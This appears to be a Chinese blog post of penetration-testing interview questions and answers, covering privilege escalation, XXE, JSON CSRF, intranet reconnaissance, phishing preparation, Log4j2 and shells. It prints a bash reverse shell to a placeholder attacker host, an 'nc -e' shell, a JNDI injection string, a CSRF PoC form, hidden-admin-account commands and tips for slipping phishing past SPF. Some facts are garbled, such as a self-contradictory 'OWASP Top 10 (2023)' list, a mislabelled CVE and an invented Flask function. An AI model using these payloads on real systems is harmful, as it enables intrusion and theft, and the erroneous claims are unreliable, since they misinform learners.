2026年渗透测试面试题总结-3(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[61. Windows与Linux提权思路对比](#61. Windows与Linux提权思路对比)

[62. Python框架及历史漏洞](#62. Python框架及历史漏洞)

[63. 小程序渗透 vs 普通Web渗透](#63. 小程序渗透 vs 普通Web渗透)

[64. App漏洞测试重点](#64. App漏洞测试重点)

[65. IDS/IPS绕过思路](#65. IDS/IPS绕过思路)

[66. JSON CSRF利用条件](#66. JSON CSRF利用条件)

[67. JSON数据包可测漏洞](#67. JSON数据包可测漏洞)

[68. XXE漏洞原理与利用](#68. XXE漏洞原理与利用)

[69. 内网信息收集命令](#69. 内网信息收集命令)

[70. 内网横向探测步骤](#70. 内网横向探测步骤)

[71. 外网打点标准流程](#71. 外网打点标准流程)

[72. FOFA高级搜索技巧](#72. FOFA高级搜索技巧)

[73. CDN识别方法](#73. CDN识别方法)

[74. 邮件钓鱼准备工作](#74. 邮件钓鱼准备工作)

[75. CMS识别的意义](#75. CMS识别的意义)

[76. Log4j2漏洞原理(CVE-2021-44228)](#76. Log4j2漏洞原理(CVE-2021-44228))

[77. 水坑攻击 vs 鱼叉攻击](#77. 水坑攻击 vs 鱼叉攻击)

[78. 操作系统识别方法](#78. 操作系统识别方法)

[79. 3389无法连接的原因](#79. 3389无法连接的原因)

[80. Windows隐藏用户创建](#80. Windows隐藏用户创建)

[81. MySQL无法连接排查](#81. MySQL无法连接排查)

[82. 文件上传监测点](#82. 文件上传监测点)

[83. 常见未授权访问漏洞](#83. 常见未授权访问漏洞)

[84. 高危函数清单](#84. 高危函数清单)

[85. 正向Shell vs 反向Shell](#85. 正向Shell vs 反向Shell)

[86. 正向代理 vs 反向代理](#86. 正向代理 vs 反向代理)

[87. OWASP Top 10漏洞(2023)](#87. OWASP Top 10漏洞(2023))

[88. SQL注入类型](#88. SQL注入类型)

[89. 中间件漏洞示例](#89. 中间件漏洞示例)

[90. 目录扫描工具](#90. 目录扫描工具)

复制代码
61	谈一谈Windows系统与Linux系统提权的思路?
62	python有哪些框架,其中出现过哪些漏洞
63	小程序的渗透和普通渗透的差异
64	app本身的漏洞测试
65	IDS/IPS防护原理及绕过思路
66	json的csrf的利用
67	json格式的数据包可以测哪些漏洞
68	简述xxe漏洞原理与利用方式
69	内网服务器,如何进行信息收集?
70	如果拿下了内网边界层的某一个机器,如何对内网其他进行探测?
71	描述外网打点的流程?
72	举几个 FOFA 在外网打点过程中的使用小技巧?
73	如何识别CDN?
74	邮件钓鱼的准备工作有哪些?
75	判断出靶标的 CMS,对外网打点有什么意义?
76	Apache Log4j2 的漏洞原理是什么?
77	水坑攻击和鱼叉攻击的区别是什么?
78	如何判断靶标站点是 windows/linux?
79	无法连接服务器 3389 端口的几种情况?
80	如何建立隐藏用户?
81	为什么 Mysql 数据库的站点,无法连接?
82	文件上传功能的监测点有哪些?
83	常见的未授权访问漏洞有哪些?
84	代码执行、文件读取、命令执行的函数有哪些?
85	正向 shell 和反向 shell 的区别是什么?
86	正向代理和反向代理的区别?
87	Web TOP 10 漏洞有哪些?
88	SQL 注入的种类有哪些?
89	常见的中间件有哪些?他们有那些漏洞?
90	常见的目录扫描工具有哪些?

61. Windows与Linux提权思路对比

系统 核心思路 典型方法
Windows 滥用系统配置/内核缺陷 1. 服务路径劫持(可写目录+重启服务) 2. MS17-010等内核漏洞 3. 令牌窃取(JuicyPotato)
Linux 权限配置错误/SUID滥用 1. SUID文件利用(find / -perm -4000) 2. Cron任务劫持 3. 内核漏洞(DirtyPipe)

62. Python框架及历史漏洞

复制代码
Markdown

1. **Django** - CVE-2022-34265:SQL注入(Trunc函数) - CVE-2021-35042:目录遍历(FileSystemStorage) 2. **Flask** - SSTI漏洞(未过滤render_template_input) 3. **Tornado** - XSRF保护绕过(旧版本Cookie处理缺陷)


63. 小程序渗透 vs 普通Web渗透

维度 小程序渗透 普通Web渗透
入口点 反编译wxapkg包获取源码 直接访问URL
通信安全 微信API鉴权漏洞(如openId泄露) 传统Cookie/Session机制
存储风险 本地Storage敏感数据明文存储 服务端数据库存储
接口测试 微信云函数未授权调用 常规API接口测试

64. App漏洞测试重点

复制代码
Markdown

1. **本地存储**:检查SharedPreferences/SQLite明文敏感数据 2. **网络通信**:HTTPS证书校验绕过(Burp抓包) 3. **组件暴露**:Android导出Activity攻击(adb shell启动) 4. **逻辑漏洞**:业务顺序绕过(如支付金额篡改)


65. IDS/IPS绕过思路

复制代码
Mermaid

graph LR A[攻击流量] --> B{IDS检测方式} B -->|特征匹配| C[编码混淆:Unicode/HEX] B -->|行为分析| D[慢速攻击:TCP分片延时] B -->|协议校验| E[协议违规:畸形包触发解析错误]


66. JSON CSRF利用条件

  • 漏洞前提

    1. 未校验Content-Type(后端仅处理JSON数据)
    2. 无Token防护
  • 利用POC

    复制代码
    Html

    <form action="https://target/api" method="POST" enctype="text/plain"> <input name='{"user":"attacker"}' type="hidden"> </form> <script>document.forms[0].submit()</script>


67. JSON数据包可测漏洞

复制代码
Markdown

1. **注入类**:SQL注入(JSON字段未过滤)、XXE(Content-Type: application/json改为XML) 2. **逻辑漏洞**:参数篡改(如{"isAdmin":true}) 3. **反序列化**:Fastjson/Jackson漏洞(CVE-2022-25845)


68. XXE漏洞原理与利用

攻击类型 原理 利用方式
文件读取 实体注入引用本地文件 <!ENTITY xxe SYSTEM "file:///etc/passwd">
SSRF 内部实体访问内网资源 <!ENTITY xxe SYSTEM "http://192.168.1.1">
DoS 递归实体消耗内存 <!ENTITY a "&b;&b;&b;...">

69. 内网信息收集命令

Windows

复制代码
Batch

net view /domain # 查域信息 arp -a # ARP表 nltest /dclist:域名 # 域控制器

Linux

复制代码
Bash

cat /etc/resolv.conf # DNS配置 ip route show # 路由表 smbtree -N # SMB共享发现


70. 内网横向探测步骤

复制代码
Mermai

graph TB A[已控边界机] --> B[存活主机扫描(nmap -sn 192.168.1.0/24)] A --> C[端口服务探测(masscan -p1-65535)] A --> D[SMB/Redis等协议爆破] D --> E[利用NTLM中继攻击(Responder)]


71. 外网打点标准流程

  1. 资产发现:域名/IP/子域名(Amass)→ 端口扫描(Nmap)
  2. 漏洞探测:CMS识别(WhatWeb)→ 历史漏洞利用(SearchSploit)
  3. 突破入口:Web漏洞(如SQLi)→ 服务弱口令(SSH/RDP)
  4. 权限维持:植入Webshell → 建立隧道(Ngrok/frp)

72. FOFA高级搜索技巧

复制代码
Markdown

1. **精准定位组件**:`app="Apache-Shiro" && country="CN"` 2. **查找历史漏洞**:`body="Struts2" && after="2023-01-01"` 3. **识别管理后台**:`title="管理系统" && header="session"` 4. **特定协议资产**:`protocol="s7"`(工控设备)


73. CDN识别方法

复制代码
Markdown

- **DNS检测**:多地Ping返回不同IP(使用`www.cdnplanet.com/tools`) - **HTTP头特征**:`Server: cloudflare` / `X-Cache: HIT` - **历史记录对比**:查询域名解析历史(SecurityTrails)


74. 邮件钓鱼准备工作

复制代码
Markdown

1. **目标画像**:收集邮箱后缀/部门架构(LinkedIn) 2. **克隆网站**:HTTrack复制登录页(含CSS/JS) 3. **发信平台**:使用SendGrid等合法服务绕过SPF 4. **载荷隐藏**:PDF嵌入CVE-2023-38831漏洞


75. CMS识别的意义

复制代码
Markdown

1. **快速漏洞利用**:针对性搜索CMS历史漏洞(如Drupalgeddon) 2. **默认路径扫描**:`/wp-admin`(WordPress)`/administrator`(Joomla) 3. **版本比对**:Nuclei扫描特定版本漏洞


76. Log4j2漏洞原理(CVE-2021-44228)

复制代码
Mermaid

graph LR A[恶意输入] --> B{日志记录} B --> C[触发JNDI解析] C --> D[加载LDAP服务] D --> E[执行远程恶意类]

关键点${jndi:ldap://attacker.com/exp} 触发RCE


77. 水坑攻击 vs 鱼叉攻击

类型 目标 实施方式
水坑攻击 特定群体(如行业网站) 入侵目标常访问的网站
鱼叉攻击 特定个人/组织 定向发送钓鱼邮件

78. 操作系统识别方法

复制代码
Markdown

- **TTL值**:Windows≈128,Linux≈64(`ping 目标`) - **HTTP头**:`Server: Microsoft-IIS` → Windows - **文件路径**:URL中出现`C:\`或`/etc/passwd`


79. 3389无法连接的原因

复制代码
Markdown

1. **网络层**:防火墙阻断/路由问题(`telnet IP 3389`) 2. **系统层**:服务未启动(`services.msc`检查TermService) 3. **权限限制**:NLA(网络级认证)要求有效凭证


80. Windows隐藏用户创建

复制代码
Batch

net user evil$ P@ssw0rd /add # 用户名末尾加$ net localgroup administrators evil$ /add # 注册表隐藏:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users


81. MySQL无法连接排查

复制代码
Markdown

1. **权限问题**:`GRANT ALL ON *.* TO 'user'@'%'`(允许远程访问) 2. **端口阻断**:防火墙禁止3306(`ufw allow 3306`) 3. **配置限制**:`bind-address=0.0.0.0`(监听所有IP)


82. 文件上传监测点

复制代码
Markdown

1. **前端绕过**:修改JS校验(Burp改Content-Type) 2. **后缀过滤**:`.php5`/`.phtml`等冷门后缀 3. **内容校验**:图片马插入恶意代码(GIF89a头部) 4. **解析漏洞**:Apache多后缀解析(`file.php.jpg`)


83. 常见未授权访问漏洞

复制代码

Markdown

复制

1. **Redis**:`redis-cli -h IP`直接执行命令 2. **Jenkins**:`/script`接口执行Groovy代码 3. **K8s API Server**:`curl https://IP:6443/api/v1/namespaces` 4. **MongoDB**:无需认证直接读写数据库


84. 高危函数清单

类型 示例函数(PHP) 示例函数(Python)
命令执行 system()/shell_exec() os.system()/subprocess.run()
文件读取 file_get_contents() open()
代码执行 eval() exec()

85. 正向Shell vs 反向Shell

复制代码
Markdown

- **正向Shell**:攻击者直连目标监听端口 `nc -lvp 4444 -e /bin/bash`(目标执行) - **反向Shell**:目标主动连接攻击者控制端 `bash -i >& /dev/tcp/attacker_ip/4444 0>&1` **关键区别**:反向Shell可绕过防火墙出站限制


86. 正向代理 vs 反向代理

类型 功能 使用场景
正向代理 客户端匿名访问服务器 突破网络审查(VPN)
反向代理 服务器隐藏真实地址 负载均衡/隐藏后端架构

87. OWASP Top 10漏洞(2023)

复制代码
Markdown

1. 访问控制失效 2. 加密机制失败 3. **注入漏洞(首位)** 4. 不安全设计 5. 安全配置错误


88. SQL注入类型

复制代码
Markdown

1. **按结果**:报错注入/联合查询/盲注(Bool/Time) 2. **按技术**:堆叠注入(;多语句)/二次注入 3. **新形态**:NoSQL注入(MongoDB JSON操作符)


89. 中间件漏洞示例

中间件 高危漏洞 影响版本
Apache Tomcat PUT方法上传木马(CVE-2017-12615) < 9.0.1
Nginx 解析漏洞(CVE-2013-4547) < 1.4.3 / < 1.5.7
WebLogic 反序列化(CVE-2020-2883) 12.2.1.3以下

90. 目录扫描工具

复制代码
Markdown

1. **主动扫描**:Dirsearch(多线程)/ DirBuster(GUI) 2. **被动探测**:Katana(爬虫集成JS解析) 3. **智能分析**:Feroxbuster(自动过滤误报)

相关推荐
sg_knight2 小时前
工厂方法模式(Factory Method)
java·服务器·python·设计模式·工厂方法模式·工厂模式
西红市杰出青年2 小时前
Python异步----------信号量
开发语言·python
tianyuanwo2 小时前
深入浅出SWIG:从C/C++到Python的无缝桥梁
c语言·c++·python·swig
金融小白数据分析之路2 小时前
msoffcrypto-tool库 Excel 加密
python·excel
星幻元宇VR2 小时前
消防安全体验一体机|消防知识安全竞赛答题软件
安全·虚拟现实
咆哮的黑化肥2 小时前
文件包含漏洞(加DVWA靶场练习)
安全·web安全
程序员敲代码吗2 小时前
使用Python进行PDF文件的处理与操作
jvm·数据库·python
以太浮标2 小时前
华为eNSP模拟器综合实验之- 路由表RIB和转发表FIB的关联解析
运维·网络·华为·信息与通信
a程序小傲2 小时前
蚂蚁Java面试被问:向量数据库的相似度搜索和索引构建
开发语言·后端·python·架构·flask·fastapi